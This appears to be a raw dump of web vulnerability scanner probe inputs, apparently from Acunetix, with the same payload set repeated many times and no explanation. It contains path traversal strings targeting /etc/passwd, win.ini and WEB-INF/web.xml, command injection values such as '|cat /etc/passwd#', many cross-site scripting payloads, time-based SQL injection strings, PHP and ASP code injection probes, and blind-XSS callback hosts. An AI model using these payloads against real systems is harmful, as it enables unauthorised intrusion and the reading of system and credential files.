..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF\web.xml

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(982369)>

-1

1

../../../../../../../../../../etc/passwd.jpg

1

${99274+100465}

1

1

`cat /etc/passwd`

1

-1)

1<img/src=">" onerror=alert(943620)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

1

1

1

1

'|'ld

-1))

1<ScRiPt%20>prompt(990146)</sCripT>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1&n999029=v910792

)

1some_inexistent_file_with_long_name%00.jpg

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

c4v4W4fw'

"|"ld

!(()&&!|*|*|

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

Kh6knCcw')

\xf6<img acu onmouseover=prompt(945948) //\xf6>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

^(#$!@#$)(()))******

1

1

'"()

'

/etc/passwd

testasp.vulnweb.com

1

'

1<input autofocus onfocus=prompt(983601)>

GVMDPdis'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

<a href='http://www.acunetix.com'>website security</a>

-1

1

1

1

1

||cat /etc/passwd

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}

-1)

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

http://hitnfUNTwXl1N.bxss.me/

&dir

-1))

${@print(md5(acunetix_wvs_security_test))}\

1

1

1_oNR3w <ScRiPt >prompt(920730)</ScRiPt>

1

acunetix_wvs_invalid_filename

1

z5ru2fJ1'

'&dir&'

1

file:///etc/passwd

1

comments

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

cNS7bRVx')

/\../\../\../\../\../\../\../etc/passwd

1

"&dir&"

comments

wfLYe6e8'))

1

1

http://www.acunetix.tst

1

'"

|dir

1

comments/.

WEB-INF/web.xml

1

1'"()&%<ScRiPt >prompt(963550)</ScRiPt>

<!--

1

1

1

'|dir

1

'"()&%<ScRiPt >prompt(997305)</ScRiPt>

1

1

WEB-INF\web.xml

1

1

"|dir

1

1_987968

1

1

../../../../../../../../../../windows/win.ini

1

acu10467\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10467

1

1

../../../../../../../../../../boot.ini

1

1

acux7638\xc0\xbez1\xc0\xbcz2a\x90bcxuca7638

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(916926)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<script>prompt(966299)</script>

1

1

1

................windowswin.ini

1<ScRiPt >prompt(984015)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?900952></ScRiPt>

1

1

1

1<ScRiPt >prompt(911993)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(961991)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(932717)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<div style=width:expression(prompt(910458))>

1

1<iframe src='data:text/html

1

response.write(9288249*9228037)

1

1

1

WEB-INF/web.xml

1<body onload=prompt(960850)>

1

'+response.write(9288249*9228037)+'

1

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(961428)>

1

1

1

&cat /etc/passwd&

"+response.write(9288249*9228037)+"

1

../../../../../../../../../../etc/passwd

1<img src=xyz OnErRor=prompt(932770)>

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

'&cat /etc/passwd&'

1

1

1<img/src=">" onerror=alert(956624)>

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<ScRiPt%20>prompt(919806)</sCripT>

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

-1

1

1&lt

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

-1)

cat /etc/passwd

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

\xf6<img acu onmouseover=prompt(914493) //\xf6>

${100167+100492}

`cat /etc/passwd`

-1))

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

1<input autofocus onfocus=prompt(951033)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n985020=v913483

|cat /etc/passwd#

2l52HzoE'

1

1

1

1some_inexistent_file_with_long_name%00.jpg

<a href='http://www.acunetix.com'>website security</a>

)

TglAZfKF')

1

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

!(()&&!|*|*|

[url=http://www.acunetix.com]website security[/url]

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

kP3cG0qH'))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"|"ld

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

-1

'

testasp.vulnweb.com

1_qvR4w <ScRiPt >prompt(908303)</ScRiPt>

/etc/passwd

1

1

1

1

"

-1)

'

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1))

${@print(md5(acunetix_wvs_security_test))}

1

1

1

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}\

AzvJR0tZ'

acunetix_wvs_invalid_filename

||cat /etc/passwd

http://hitmGhDBWYjcp.bxss.me/

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

F0uDT1HB')

1

1

comments

1

1

1

1

&dir

OTDVspaF'))

1

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

file:///etc/passwd

'&dir&'

1

1

'"

1

1'"()&%<ScRiPt >prompt(989813)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

comments/.

"&dir&"

WEB-INF/web.xml

1

<!--

1

1

'"()&%<ScRiPt >prompt(907333)</ScRiPt>

|dir

1

1

WEB-INF\web.xml

1

1_945302

1

1

../../../../../../../../../../windows/win.ini

1

'|dir

1

1

1

acu3917\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3917

1

"|dir

../../../../../../../../../../boot.ini

acux4456\xc0\xbez1\xc0\xbcz2a\x90bcxuca4456

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1<ScRiPt >prompt(965408)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<script>prompt(918500)</script>

1

1

................windowswin.ini

1

1

1<ScRiPt >prompt(959573)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?973803></ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(900385)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<video><source onerror="javascript:prompt(949990)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(952145)"></g></svg>

response.write(9449221*9888493)

1

1<div style=width:expression(prompt(967653))>

1

1

1

WEB-INF/web.xml

'+response.write(9449221*9888493)+'

1<iframe src='data:text/html

1

1

1

1<body onload=prompt(915639)>

"+response.write(9449221*9888493)+"

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

WEB-INF\web.xml

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

../../../../../../../../../../etc/passwd

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(979308)>

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<img src=xyz OnErRor=prompt(970072)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"&cat /etc/passwd&"

-1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img/src=">" onerror=alert(919011)>

cat /etc/passwd

1

../../../../../../../../../../etc/passwd.jpg

1

-1)

1

1<ScRiPt%20>prompt(986000)</sCripT>

1

1

`cat /etc/passwd`

${99290+99498}

-1))

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

|cat /etc/passwd#

1&lt

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1YLa50iV'

1

\xf6<img acu onmouseover=prompt(987950) //\xf6>

'|'ld

1

1&n999654=v908929

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

syV64ZIq')

1

)

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<input autofocus onfocus=prompt(915899)>

testasp.vulnweb.com

1

"|"ld

HwRM96sI'))

<a href='http://www.acunetix.com'>website security</a>

1

!(()&&!|*|*|

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

-1

'"()

1

[url=http://www.acunetix.com]website security[/url]

1

^(#$!@#$)(()))******

/etc/passwd

1

-1)

1_9VUrx <ScRiPt >prompt(979472)</ScRiPt>

'

1

1

'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1))

1

1

1

"

"

1

1

1

||cat /etc/passwd

LiBs0dsZ'

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

http://hit3I9bm1Daja.bxss.me/

1

&dir

k3iX4EFC')

1

1

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}\

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

wVXImCVN'))

1

'&dir&'

1

file:///etc/passwd

http://www.acunetix.tst

1

comments

1

1

'"

/\../\../\../\../\../\../\../etc/passwd

"&dir&"

1

1'"()&%<ScRiPt >prompt(907052)</ScRiPt>

1

1

comments

1

<!--

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(978161)</ScRiPt>

|dir

1

1

1

1

comments/.

WEB-INF\web.xml

1

1

'|dir

1_913920

1

../../../../../../../../../../windows/win.ini

1

1

1

acu4694\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4694

1

"|dir

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux4676\xc0\xbez1\xc0\xbcz2a\x90bcxuca4676

1

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(993767)</ScRiPt>

1

1

1

1

1

................windowswin.ini

1<script>prompt(901763)</script>

1

1

1

1<ScRiPt >prompt(943837)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?975572></ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(950550)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<video><source onerror="javascript:prompt(986685)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(925485)"></g></svg>

1

1

1<div style=width:expression(prompt(908754))>

WEB-INF/web.xml

1

1

1<iframe src='data:text/html

WEB-INF\web.xml

1

1

1

1

1<body onload=prompt(965822)>

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(982383)>

1

1

1

1<img src=xyz OnErRor=prompt(940521)>

1

1

1<img/src=">" onerror=alert(966170)>

1

1<ScRiPt%20>prompt(973039)</sCripT>

1

1

1&lt

1

\xf6<img acu onmouseover=prompt(953251) //\xf6>

1

1

1<input autofocus onfocus=prompt(912593)>

1

<a href='http://www.acunetix.com'>website security</a>

[url=http://www.acunetix.com]website security[/url]

1

1_WnUHE <ScRiPt >prompt(960326)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9616504*9152144)

1

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

'+response.write(9616504*9152144)+'

1

1

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9616504*9152144)+"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

-1

1

-1)

1

${99140+100186}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n972198=v977119

|cat /etc/passwd#

1

-1))

)

1

1some_inexistent_file_with_long_name%00.jpg

'|'ld

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

0WgY2SR7'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

'

testasp.vulnweb.com

K6NrmKv8')

^(#$!@#$)(()))******

1

"

/etc/passwd

1

1

1

02eYKLUE'))

1

'

http://hitj3sGN8X0PH.bxss.me/

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

"

1

-1

1

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}\

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

-1)

1

comments

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1))

1

http://www.acunetix.tst

&dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

1

'"

1

tZG2OgLA'

comments/.

'&dir&'

1

1'"()&%<ScRiPt >prompt(922950)</ScRiPt>

K2VS25Og')

1

<!--

file:///etc/passwd

'"()&%<ScRiPt >prompt(956929)</ScRiPt>

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

1

1

TP0VzBwJ'))

1

|dir

1_910342

WEB-INF/web.xml

1

1

1

1

acu5837\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5837

WEB-INF\web.xml

'|dir

1

1

"|dir

../../../../../../../../../../windows/win.ini

acux2356\xc0\xbez1\xc0\xbcz2a\x90bcxuca2356

1

1

1

1<ScRiPt >prompt(989370)</ScRiPt>

../../../../../../../../../../boot.ini

1

1

1

1<script>prompt(997295)</script>

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(959991)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?903224></ScRiPt>

1

1

................windowswin.ini

1

1<ScRiPt >prompt(948050)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<video><source onerror="javascript:prompt(966979)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(966336)"></g></svg>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9619770*9147549)

1<div style=width:expression(prompt(976001))>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

'+response.write(9619770*9147549)+'

1

&cat /etc/passwd&

1<iframe src='data:text/html

"+response.write(9619770*9147549)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF/web.xml

'&cat /etc/passwd&'

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<body onload=prompt(996828)>

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

WEB-INF\web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(965262)>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

-1

1

1<img src=xyz OnErRor=prompt(908638)>

../../../../../../../../../../etc/passwd.jpg

1

1

1

`cat /etc/passwd`

${99134+100499}

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img/src=">" onerror=alert(948281)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

-1))

|cat /etc/passwd#

1

1some_inexistent_file_with_long_name%00.jpg

1

1<ScRiPt%20>prompt(964002)</sCripT>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

vsUnR41m'

1&n961941=v920259

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1&lt

1

1

testasp.vulnweb.com

"|"ld

OGM61qIi')

)

\xf6<img acu onmouseover=prompt(980628) //\xf6>

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

3TWekHaY'))

1

'"()

1<input autofocus onfocus=prompt(918680)>

'

/etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

<a href='http://www.acunetix.com'>website security</a>

1

1

-1

'

"

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

[url=http://www.acunetix.com]website security[/url]

"

-1)

${@print(md5(acunetix_wvs_security_test))}

1

1

1_DfwvQ <ScRiPt >prompt(978037)</ScRiPt>

1

http://hitt3W3oukI5k.bxss.me/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

-1))

acunetix_wvs_invalid_filename

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

&dir

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

vlQiJ2my'

1

1

1

1

1

'&dir&'

http://www.acunetix.tst

1

1

Pja3LFrm')

comments

1

file:///etc/passwd

1'"()&%<ScRiPt >prompt(904713)</ScRiPt>

'"

"&dir&"

1

k6wMT8CX'))

1

comments/.

1

/\../\../\../\../\../\../\../etc/passwd

1

<!--

|dir

'"()&%<ScRiPt >prompt(957674)</ScRiPt>

WEB-INF/web.xml

1

1

1

1_929590

'|dir

1

1

1

1

WEB-INF\web.xml

1

1

acu3722\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3722

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

acux6547\xc0\xbez1\xc0\xbcz2a\x90bcxuca6547

1

1

1

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(920741)</ScRiPt>

1

1

1

1<script>prompt(996207)</script>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(907642)</ScRiPt>

1

1

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?963548></ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(938945)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<video><source onerror="javascript:prompt(919586)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9597697*9151146)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(915571)"></g></svg>

1

'+response.write(9597697*9151146)+'

1

1

&cat /etc/passwd&

1<div style=width:expression(prompt(970834))>

1

1

'&cat /etc/passwd&'

1

"+response.write(9597697*9151146)+"

1<iframe src='data:text/html

WEB-INF/web.xml

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

"&cat /etc/passwd&"

1

WEB-INF\web.xml

1<body onload=prompt(991021)>

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(927352)>

1

cat /etc/passwd

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=xyz OnErRor=prompt(987729)>

../../../../../../../../../../etc/passwd.jpg

1

1

`cat /etc/passwd`

-1)

SomeCustomInjectedHeader:injected_by_wvs

1<img/src=">" onerror=alert(922758)>

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

1

${99576+100219}

-1))

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n990252=v962426

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<ScRiPt%20>prompt(928282)</sCripT>

1

awfzGyzZ'

1

1

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1&lt

1some_inexistent_file_with_long_name%00.jpg

1

N1sPNx75')

)

1

"|"ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

\xf6<img acu onmouseover=prompt(943900) //\xf6>

!(()&&!|*|*|

hT7jjNxm'))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

1<input autofocus onfocus=prompt(910567)>

'"()

/etc/passwd

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

testasp.vulnweb.com

-1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

'

<a href='http://www.acunetix.com'>website security</a>

1

-1)

1

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

[url=http://www.acunetix.com]website security[/url]

1

"

1

1

-1))

${@print(md5(acunetix_wvs_security_test))}

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1_Se0xV <ScRiPt >prompt(954703)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}\

1

http://hit2KNRUGwagq.bxss.me/

||cat /etc/passwd

acunetix_wvs_invalid_filename

M2VNzVt0'

1

1

1

1

comments

1

U3zdj5gA')

&dir

1

comments

1

file:///etc/passwd

1

1

1

1

'&dir&'

5i6zMjk1'))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

comments/.

'"

1

1

/\../\../\../\../\../\../\../etc/passwd

1

<!--

1

1

1

"&dir&"

1

1

WEB-INF/web.xml

1'"()&%<ScRiPt >prompt(923939)</ScRiPt>

1

1

1

1

|dir

1

WEB-INF\web.xml

1

1

1

'"()&%<ScRiPt >prompt(998422)</ScRiPt>

../../../../../../../../../../windows/win.ini

1

'|dir

1

1

1_983265

"|dir

../../../../../../../../../../boot.ini

1

1

1

1

acu7856\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7856

1

../../../../../../../../../../windows/win.ini.jpg

1

acux5468\xc0\xbez1\xc0\xbcz2a\x90bcxuca5468

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(907390)</ScRiPt>

1

................windowswin.ini

1

1

1<script>prompt(992293)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(992783)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?994488></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt >prompt(945572)</ScRiPt>

response.write(9674573*9358797)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

'+response.write(9674573*9358797)+'

1<video><source onerror="javascript:prompt(950211)">

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

&cat /etc/passwd&

"+response.write(9674573*9358797)+"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

WEB-INF/web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(910163)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

